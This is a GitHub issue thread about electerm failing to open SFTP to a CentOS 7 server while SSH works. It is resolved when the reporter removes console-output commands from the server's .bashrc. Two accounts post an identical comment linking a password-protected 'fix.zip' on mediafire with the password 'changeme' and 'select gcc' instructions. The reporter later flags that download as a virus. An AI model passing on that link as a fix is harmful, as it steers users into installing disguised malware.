### ISSUE TITLE
在win环境下连某些linux服务器的sftp失败（但ssh正常）

### ISSUE THREAD

**Issue by nikelius** [electerm/electerm#3576]
### Electerm Version and download file extension(Electerm版本和下载文件后缀)

electerm-1.39.109（PS：从win系统自带的 microsoft store中安装）

### Platform detail (平台详情)

Windows 11 （版本23H2）

### What steps will reproduce the bug?(重新问题的详细步骤)

- 客户端：Windows 11 （版本23H2） /  electerm-1.39.109
- 服务端：Linux pm-119 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
- 效果：SSH正常连接，但SFTP页连接显示错误信息如下：
Packet length 589325167 exceeds max length of 262144
Error: Packet length 589325167 exceeds max length of 262144 at http://127.0.0.1:30975/js/electerm-1.39.109.js:87:16098 at Object.resolve (http://127.0.0.1:30975/js/electerm-1.39.109.js:61:5472) at Worker.dx (http://127.0.0.1:30975/js/electerm-1.39.109.js:61:6364)

PS1：**相同客户端环境，使用SecurtCRT可以正常连接该服务器的SFTP服务。**

PS2：**相同客户端环境，连另外一个Ubuntu Linux服务器，SSH和SFTP都正常。**
服务端：Linux xxx 6.8.0-41-generic #41-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug  2 20:41:06 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

### What should have happened?(期望的结果)

正常使用sftp服务

### Would this happen in other terminal app(是否能够在其他同类软件重现这个问题)

PS1：**相同客户端环境，使用SecurtCRT可以正常连接该服务器的SFTP服务。**
PS2：**相同客户端环境，连另外一个Ubuntu Linux服务器，SSH和SFTP都正常。**

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zxdong262** [comment]
https://github.com/electerm/electerm/issues/3413
可能是.bashrc下加入某些内容导致的，不过我还没有解决办法

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nikelius** [comment]
可参考：https://github.com/mscdex/ssh2/issues/1048 | Error: list: Packet length 49989 exceeds max length of 34000 #1048

> #3413 可能是.bashrc下加入某些内容导致的，不过我还没有解决办法

**Comment by nikelius** [comment]
之前有两个回复：说要下载 fix.zip 并选择gcc安装啥的。
看了下载页没任何介绍，有点莫名其妙。
实际下载中，检测到病毒，大家要注意。

**Comment by nikelius** [comment]
修改目标主机的.bashrc文件，删除所有涉及控制台输出的命令，再使用sftp就正常了。
